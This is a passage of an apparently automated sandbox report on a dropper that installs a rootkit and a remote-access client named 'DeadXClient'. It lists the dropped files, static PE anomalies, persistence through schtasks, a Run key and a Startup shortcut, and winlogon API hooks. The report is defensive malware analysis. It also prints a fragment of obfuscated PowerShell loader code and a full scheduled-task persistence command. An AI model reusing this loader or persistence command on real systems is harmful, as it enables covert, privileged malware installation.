Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$fbfUvfPkbf,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'im'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $SKuzEDmHWUw.CreateType();}$mHgtxYLbOzoJe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+[Char](78)+''+'a'+''+'t'+'ive'+'M'+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$mfOCIRUxBUWIVl=$mHgtxYLbOzoJe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD8F787B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,5_2_00007FFD8F787B30
                        Source: select.pyd.2.dr Static PE information: real checksum: 0x0 should be: 0x9204
                        Source: md__mypyc.cp311-win_amd64.pyd.2.dr Static PE information: real checksum: 0x0 should be: 0x1697d
                        Source: _bz2.pyd.2.dr Static PE information: real checksum: 0x0 should be: 0x13b27
                        Source: libffi-8.dll.2.dr Static PE information: real checksum: 0x0 should be: 0xa3cf
                        Source: 1.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x7db54
                        Source: aoKTzGQSRP.exe Static PE information: real checksum: 0x9b3d14 should be: 0x9c5c96
                        Source: DeadXClient.exe.4.dr Static PE information: real checksum: 0x0 should be: 0xaf4a
                        Source: _ssl.pyd.2.dr Static PE information: real checksum: 0x0 should be: 0x11e83
                        Source: _socket.pyd.2.dr Static PE information: real checksum: 0x0 should be: 0x1a742
                        Source: _queue.pyd.2.dr Static PE information: real checksum: 0x0 should be: 0xd492
                        Source: libssl-3.dll.2.dr Static PE information: real checksum: 0x0 should be: 0x398cf
                        Source: _hashlib.pyd.2.dr Static PE information: real checksum: 0x0 should be: 0x170e7
                        Source: DeadCodeRootKit.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x3447e
                        Source: Deadsvchost.exe.6.dr Static PE information: real checksum: 0x0 should be: 0xaf4a
                        Source: unicodedata.pyd.2.dr Static PE information: real checksum: 0x0 should be: 0x50b29
                        Source: _rust.pyd.2.dr Static PE information: real checksum: 0x0 should be: 0x20b882
                        Source: _ctypes.pyd.2.dr Static PE information: real checksum: 0x0 should be: 0x160fc
                        Source: md.cp311-win_amd64.pyd.2.dr Static PE information: real checksum: 0x0 should be: 0x3c4e
                        Source: DeadROOTkit.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x114e6
                        Source: _cffi_backend.cp311-win_amd64.pyd.2.dr Static PE information: real checksum: 0x0 should be: 0x15ec5
                        Source: libcrypto-3.dll.2.dr Static PE information: real checksum: 0x0 should be: 0x192d2d
                        Source: python311.dll.2.dr Static PE information: real checksum: 0x0 should be: 0x1a10e1
                        Source: _decimal.pyd.2.dr Static PE information: real checksum: 0x0 should be: 0x24c41
                        Source: _lzma.pyd.2.dr Static PE information: real checksum: 0x0 should be: 0x21bf5
                        Source: VCRUNTIME140.dll.2.dr Static PE information: section name: _RDATA
                        Source: libffi-8.dll.2.dr Static PE information: section name: UPX2
                        Source: _rust.pyd.2.dr Static PE information: section name: UPX2
                        Source: C:\Users\user\AppData\Local\Temp\1.exe Code function: 4_2_00007FFD344E00BD pushad ; iretd 4_2_00007FFD344E00C1
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93485EAD push rsp; iretd 5_2_00007FFD93485EAE
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93485EBC push rsi; ret 5_2_00007FFD93485EBD
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93485FB9 push r10; ret 5_2_00007FFD93485FCC
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93488DA5 push rsp; retf 5_2_00007FFD93488DA6
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD934882C4 push rdi; iretd 5_2_00007FFD934882C6
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93488077 push r12; iretd 5_2_00007FFD9348808B
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD9348767B push r12; ret 5_2_00007FFD934876BF
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93485F76 push r8; ret 5_2_00007FFD93485F83
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD9348685F push rsi; ret 5_2_00007FFD93486896
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93485C31 push r10; ret 5_2_00007FFD93485C33
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93487630 push rbp; retf 5_2_00007FFD93487649
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93488F28 push rsp; iretq 5_2_00007FFD93488F29
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93487F53 push rbp; iretq 5_2_00007FFD93487F54
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93485E58 push rdi; iretd 5_2_00007FFD93485E5A
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93485F56 push r12; ret 5_2_00007FFD93485F6E
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93485EFA push r12; ret 5_2_00007FFD93485F07
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93485DF7 push r10; retf 5_2_00007FFD93485DFA
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93485CE0 push r10; retf 5_2_00007FFD93485CE2
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93487FEB push r12; ret 5_2_00007FFD93488036
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93485CE5 push r8; ret 5_2_00007FFD93485CEB
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93485E0F push rsp; ret 5_2_00007FFD93485E17
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD9348930D push rsp; ret 5_2_00007FFD9348930E
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93488405 push r10; retf 5_2_00007FFD93488471
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93485CFE push rdx; ret 5_2_00007FFD93485D01
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD93485D06 push r12; ret 5_2_00007FFD93485D08
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD935C4541 push rcx; ret 5_2_00007FFD935C4542
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD9F3B437B push r8; ret 5_2_00007FFD9F3B4380
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 5_2_00007FFD9F3BD888 push rax; retn 8F7Eh 5_2_00007FFD9F3BD889
                        Source: C:\Users\Public\DeadXClient.exe Code function: 6_2_00007FFD344F00BD pushad ; iretd 6_2_00007FFD344F00C1
                        Source: C:\Users\Public\DeadXClient.exe Code function: 6_2_00007FFD344F023D push ds; retf 6_2_00007FFD344F0272
                        Source: initial sample Static PE information: section name: UPX0
                        Source: initial sample Static PE information: section name: UPX1

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Process created: "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe"
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\_decimal.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\python3.dll
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exe File created: C:\Users\user\AppData\Local\Temp\1.exe
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\libssl-3.dll
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\_lzma.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography\hazmat\bindings\_rust.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer\md.cp311-win_amd64.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\python311.dll
                        Source: C:\Users\user\AppData\Local\Temp\1.exe File created: C:\Users\Public\DeadXClient.exe
                        Source: C:\Users\Public\DeadXClient.exe File created: C:\Users\Public\Deadsvchost.exe
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\_queue.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\_hashlib.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\VCRUNTIME140.dll
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\_ssl.pyd
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exe File created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                        Source: C:\Users\user\AppData\Local\Temp\1.exe File created: C:\Users\Public\DeadROOTkit.exe
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\libcrypto-3.dll
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\_ctypes.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\_cffi_backend.cp311-win_amd64.pyd
                        Source: C:\Users\user\AppData\Local\Temp\1.exe File created: C:\Users\Public\DeadCodeRootKit.exe
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\_socket.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\_bz2.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\select.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\unicodedata.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe File created: C:\Users\user\AppData\Local\Temp\_MEI48002\libffi-8.dll

                        Boot Survival

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\1.exe File created: C:\Users\Public\DeadROOTkit.exe
                        Source: C:\Users\user\AppData\Local\Temp\1.exe File created: C:\Users\Public\DeadXClient.exe
                        Source: C:\Users\user\AppData\Local\Temp\1.exe File created: C:\Users\Public\DeadCodeRootKit.exe
                        Source: C:\Users\Public\DeadXClient.exe File created: C:\Users\Public\Deadsvchost.exe
                        Source: C:\Users\Public\DeadXClient.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
                        Source: C:\Users\Public\DeadXClient.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk
                        Source: C:\Users\Public\DeadXClient.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Deadsvchost

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                        Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                        Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                        Source: winlogon.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe Code function: 2_2_00007FF6FABE42E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00007FF6FABE42E0
                        Source: C:\Users\Public\DeadCodeRootKit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE Deadstager
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
